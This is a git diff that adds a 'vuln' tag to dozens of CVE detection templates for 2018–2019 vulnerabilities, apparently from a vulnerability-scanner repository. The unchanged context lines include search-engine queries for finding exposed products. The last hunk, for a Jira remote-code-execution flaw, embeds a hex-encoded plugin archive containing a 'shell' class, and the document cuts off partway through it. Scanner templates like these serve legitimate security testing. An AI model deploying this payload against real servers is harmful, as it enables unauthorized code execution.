cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" - tags: cve2018,cve,nextjs,lfi,traversal,zeit + tags: cve2018,cve,nextjs,lfi,traversal,zeit,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 2e743406210..017582cc4a8 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -38,7 +38,7 @@ info: google-query: - intext:"powered by vbulletin" - intitle:"powered by vbulletin" - tags: cve,cve2018,redirect,vbulletin + tags: cve,cve2018,redirect,vbulletin,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index c4a08af9449..332d3bfeca4 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: dlink product: dir-860l_firmware - tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink,vkev + tags: cve,cve2018,d-link,rce,oast,unauth,kev,dlink,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-6605.yaml b/http/cves/2018/CVE-2018-6605.yaml index c479fcbd07f..2e96ad833f6 100644 --- a/http/cves/2018/CVE-2018-6605.yaml +++ b/http/cves/2018/CVE-2018-6605.yaml @@ -26,7 +26,7 @@ info: fofa-query: - app="Joomla!-网站安装" - app="joomla!-网站安装" - tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project,vkev + tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project,vkev,vuln variables: num: "{{rand_int(2000000000, 2100000000)}}" diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 3f82e5bfece..4de58a7a815 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="dedecms" - app="dedecms" - tags: cve,cve2018,dedecms + tags: cve,cve2018,dedecms,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7192.yaml b/http/cves/2018/CVE-2018-7192.yaml index afc413f68f4..d0b21e4d78b 100644 --- a/http/cves/2018/CVE-2018-7192.yaml +++ b/http/cves/2018/CVE-2018-7192.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2018,osticket,xss,authenticated + tags: cve,cve2018,osticket,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2018/CVE-2018-7193.yaml b/http/cves/2018/CVE-2018-7193.yaml index ca6b165dbd0..96ecacbd9f8 100644 --- a/http/cves/2018/CVE-2018-7193.yaml +++ b/http/cves/2018/CVE-2018-7193.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2018,osticket,xss,authenticated + tags: cve,cve2018,osticket,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2018/CVE-2018-7196.yaml b/http/cves/2018/CVE-2018-7196.yaml index bb29b522eca..e414c5b34c6 100644 --- a/http/cves/2018/CVE-2018-7196.yaml +++ b/http/cves/2018/CVE-2018-7196.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2018,osticket,xss,authenticated + tags: cve,cve2018,osticket,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index 57e6a192d2b..2ad4898d104 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: anchorcms product: anchor - tags: cve,cve2018,anchorcms,logs,error,packetstorm + tags: cve,cve2018,anchorcms,logs,error,packetstorm,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 3cf6ddade11..f41474da947 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -31,7 +31,7 @@ info: fofa-query: title="printmonitor" google-query: intitle:"printmonitor" product": printmonitor - tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool,vkev + tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool,vkev,vuln variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index 9648a827a81..72c1ee79f65 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -27,7 +27,7 @@ info: fofa-query: - app="Joomla!-网站安装" - app="joomla!-网站安装" - tags: cve,cve2018,joomla,sqli,mlwebtechnologies,vkev + tags: cve,cve2018,joomla,sqli,mlwebtechnologies,vkev,vuln variables: num: "{{rand_int(800000000, 1000000000)}}" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index a249ce49dd3..e3a530d49a5 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -29,7 +29,7 @@ info: vendor: siteeditor product: site_editor framework: wordpress - tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor,vkev + tags: cve2018,cve,wordpress,wp-plugin,lfi,edb,seclists,siteeditor,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 9c653fb828d..14875522649 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: axxonsoft product: next - tags: cve,cve2018,axxonsoft,lfi,packetstorm + tags: cve,cve2018,axxonsoft,lfi,packetstorm,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index 733cc43ef29..7cf3aa5691e 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: unbit product: uwsgi - tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit + tags: cve2018,cve,uwsgi,php,lfi,plugin,edb,unbit,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 37fb03521c6..1560ffbd57c 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive,vkev + tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 0f687e8f4b9..4fcaa24e184 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb,vkev + tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb,vkev,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 0cd861237fd..ad774deb15a 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -32,7 +32,7 @@ info: - title="YzmCMS" - title="yzmcms" google-query: intitle:"yzmcms" - tags: cve,cve2018,packetstorm,yzmcms,cms,xss + tags: cve,cve2018,packetstorm,yzmcms,cms,xss,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 3b2029d968d..56bce51ee45 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: couchcms product: couch - tags: cve2018,cve,couchcms,fpd + tags: cve2018,cve,couchcms,fpd,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index cbcb16fe296..491852f9333 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="dedecms" - app="dedecms" - tags: cve,cve2018,dedecms,rce,vkev + tags: cve,cve2018,dedecms,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 62cba51a734..844bbf02bc4 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: acrolinx product: acrolinx_server - tags: cve2018,cve,acrolinx,lfi,packetstorm,edb + tags: cve2018,cve,acrolinx,lfi,packetstorm,edb,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-7841.yaml b/http/cves/2018/CVE-2018-7841.yaml index 75fc0be5e7b..3176beb3893 100644 --- a/http/cves/2018/CVE-2018-7841.yaml +++ b/http/cves/2018/CVE-2018-7841.yaml @@ -29,7 +29,7 @@ info: vendor: schneider-electric product: u.motion_builder shodan-query: http.headers_hash:1985490094 - tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev + tags: cve,cve2018,schneider-electric,rce,kev,oast,oob,vkev,vuln variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index d4e7e08907f..7f547b548da 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -35,7 +35,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" - tags: cve2018,cve,apache,activemq,xss,vkev + tags: cve2018,cve,apache,activemq,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-8024.yaml b/http/cves/2018/CVE-2018-8024.yaml index 20f4404f398..78f280316a7 100644 --- a/http/cves/2018/CVE-2018-8024.yaml +++ b/http/cves/2018/CVE-2018-8024.yaml @@ -24,7 +24,7 @@ info: product: spark shodan-query: title:"spark master at" fofa-query: title="spark master at" - tags: cve,cve2018,spark,xss,ui + tags: cve,cve2018,spark,xss,ui,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index ae59e4d2676..819a0bd16c8 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="ofbiz" - app="apache_ofbiz" - tags: cve,cve2018,apache,ofbiz,xxe + tags: cve,cve2018,apache,ofbiz,xxe,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index 652fadc5f2d..5c21040f524 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -28,7 +28,7 @@ info: vendor: embedthis product: appweb shodan-query: cpe:"cpe:2.3:a:embedthis:appweb" - tags: cve,cve2018,appweb,auth-bypass,embedthis + tags: cve,cve2018,appweb,auth-bypass,embedthis,vuln http: - raw: diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 8f3b48b1cc1..260c0faeb34 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -29,7 +29,7 @@ info: vendor: wpsecurityauditlog product: wp_security_audit_log framework: wordpress - tags: cve,cve2018,exposure,edb,wordpress,wp-plugin,wpsecurityauditlog + tags: cve,cve2018,exposure,edb,wordpress,wp-plugin,wpsecurityauditlog,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index e031e5a36d7..1490487fee1 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mirasys product: dvms_workstation - tags: cve,cve2018,mirasys,lfi,packetstorm + tags: cve,cve2018,mirasys,lfi,packetstorm,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 41c6e6fdf08..623820a4bd7 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cobub product: razor - tags: cve,cve2018,cobub,razor,exposure,edb + tags: cve,cve2018,cobub,razor,exposure,edb,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 0162891f8ca..92b39b47b8f 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -27,7 +27,7 @@ info: product: responsive_mega_menu_pro framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2018,prestashop,rce,sqli,responsive_mega_menu_pro_project + tags: cve,cve2018,prestashop,rce,sqli,responsive_mega_menu_pro_project,vuln variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index b59ad6dde88..772fee7c554 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -29,7 +29,7 @@ info: vendor: 99robots product: wp_background_takeover_advertisements framework: wordpress - tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots,vkev + tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 70a8d15a9ca..e48db43d247 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: prismaindustriale product: checkweigher_prismaweb - tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale + tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 86cdd4df743..714544882a7 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -25,7 +25,7 @@ info: vendor: drupal product: avatar_uploader shodan-query: http.component:"drupal" - tags: cve,cve2018,lfi,drupal,edb,vkev + tags: cve,cve2018,lfi,drupal,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 533804707a2..cff2df96f0d 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: etherpad product: etherpad_lite - tags: cve2018,cve,etherpad,auth-bypass + tags: cve2018,cve,etherpad,auth-bypass,vuln http: - method: GET diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index b5541656cd9..f4fc2f25030 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: tbkvision product: tbk-dvr4216_firmware - tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision,vkev + tags: cve,cve2018,auth-bypass,tbk,edb,tbkvision,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-0192.yaml b/http/cves/2019/CVE-2019-0192.yaml index f17d1191d68..9d85e1a636b 100644 --- a/http/cves/2019/CVE-2019-0192.yaml +++ b/http/cves/2019/CVE-2019-0192.yaml @@ -23,7 +23,7 @@ info: product: solr shodan-query: title:"Solr" fofa-query: title="Solr - tags: cve,cve2019,apache,solr,deserialization,rce,oast,vkev + tags: cve,cve2019,apache,solr,deserialization,rce,oast,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 9c827bc4502..320a00f5ea2 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -38,7 +38,7 @@ info: google-query: - intitle:"apache solr" - intitle:"solr admin" - tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub,vkev + tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index f211118082e..89be19262ef 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -37,7 +37,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve2019,cve,apache,xss,tomcat,seclists,edb + tags: cve2019,cve,apache,xss,tomcat,seclists,edb,vuln variables: payload: "" diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index f24944e9d58..eeffd4bb0d0 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -36,7 +36,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve,cve2019,tenable,packetstorm,struts,rce,apache + tags: cve,cve2019,tenable,packetstorm,struts,rce,apache,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2019/CVE-2019-0232.yaml b/http/cves/2019/CVE-2019-0232.yaml index 0e818cc39fe..1ced8ae884b 100644 --- a/http/cves/2019/CVE-2019-0232.yaml +++ b/http/cves/2019/CVE-2019-0232.yaml @@ -33,7 +33,7 @@ info: - body="apache tomcat" - title="apache tomcat" google-query: intitle:"apache tomcat" - tags: cve,cve2019,packetstorm,seclists,apache,tomcat,vkev + tags: cve,cve2019,packetstorm,seclists,apache,tomcat,vkev,vuln variables: sid: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-1003000.yaml b/http/cves/2019/CVE-2019-1003000.yaml index 967887264a0..daa272eddf5 100644 --- a/http/cves/2019/CVE-2019-1003000.yaml +++ b/http/cves/2019/CVE-2019-1003000.yaml @@ -25,7 +25,7 @@ info: max-request: 6 vendor: jenkins product: script_security - tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev + tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev,vuln variables: username: admin diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 56edd1733c7..ac12b50c307 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -28,7 +28,7 @@ info: vendor: kentico product: kentico shodan-query: cpe:"cpe:2.3:a:kentico:kentico" - tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf,vkev + tags: cve,cve2019,kentico,iis,packetstorm,rce,deserialization,kev,msf,vkev,vuln http: - method: POST diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 2c914b98848..a84ad13ac86 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -30,7 +30,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve,cve2019,apache,htmli,injection + tags: cve,cve2019,apache,htmli,injection,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 53fefce8f2d..dc0c130d56a 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -32,7 +32,7 @@ info: shodan-query: - cpe:"cpe:2.3:a:apache:http_server" - apache 2.4.49 - tags: cve,cve2019,redirect,apache,server,vkev + tags: cve,cve2019,redirect,apache,server,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index a3ef080dbe0..1fdf183a5e5 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -28,7 +28,7 @@ info: vendor: timesheet_next_gen_project product: timesheet_next_gen google-query: inurl:"/timesheet/login.php" - tags: cve,cve2019,timesheet,xss,timesheet_next_gen_project + tags: cve,cve2019,timesheet,xss,timesheet_next_gen_project,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 19cfc1cd51a..28617f9319d 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: cmsmadesimple product: bable\ - tags: cve2019,cve,redirect,babel,cmsmadesimple + tags: cve2019,cve,redirect,babel,cmsmadesimple,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index e4b6517ab32..0f42b4e6761 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: teclib-edition product: gestionnaire_libre_de_parc_informatique - tags: cve,cve2019,glpi,sqli,injection,teclib-edition,vkev + tags: cve,cve2019,glpi,sqli,injection,teclib-edition,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 0eb78ec9fcd..9c27db40d39 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -31,7 +31,7 @@ info: - cpe:"cpe:2.3:a:jenkins:jenkins" - product:"jenkins" fofa-query: icon_hash=81586312 - tags: cve,cve2019,jenkins + tags: cve,cve2019,jenkins,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index 4296fb0dd8a..affd619af3e 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -28,7 +28,7 @@ info: vendor: jenkins product: build-metrics framework: jenkins - tags: cve,cve2019,jenkins,xss,plugin,packetstorm + tags: cve,cve2019,jenkins,xss,plugin,packetstorm,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index 1aa38817c8d..a918be9aaa3 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -30,7 +30,7 @@ info: vendor: codecabin product: wp_go_maps framework: wordpress - tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin + tags: cve2019,cve,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan,codecabin,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 0db74ead263..b2809d69b87 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -33,7 +33,7 @@ info: - http.html:"Blogengine.net" - http.html:"blogengine.net" fofa-query: body="blogengine.net" - tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine + tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 4736549395c..98ac324c2ab 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -31,7 +31,7 @@ info: - http.title:"mongo express" fofa-query: title="mongo express" google-query: intitle:"mongo express" - tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js,vkev + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 878e818f194..8fa63a8fe17 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: softvelum product: nimble_streamer - tags: cve,cve2019,lfi,nimble,edb,packetstorm,softvelum + tags: cve,cve2019,lfi,nimble,edb,packetstorm,softvelum,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index c5279b3bde2..81699fa23c7 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -33,7 +33,7 @@ info: - title="kubernetes web view" - app="kubernetes-enterprise-manager" google-query: intitle:"kubernetes web view" - tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure,vkev + tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index a92773d4c68..c9bb8c7f922 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -32,7 +32,7 @@ info: - http.html:"pCOWeb" - http.html:"pcoweb" fofa-query: body="pcoweb" - tags: cve,cve2019,pcoweb,xss,carel,edb,vkev + tags: cve,cve2019,pcoweb,xss,carel,edb,vkev,vuln http: - raw: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 853e21183bf..d145a116b8f 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -34,7 +34,7 @@ info: - body="welcome.cgi?p=logo" - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti,vkev + tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti,vkev,vuln http: - method: GET diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 4158489141b..d3ad910cfc0 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -29,7 +29,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth,vkev + tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth,vkev,vuln variables: plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d041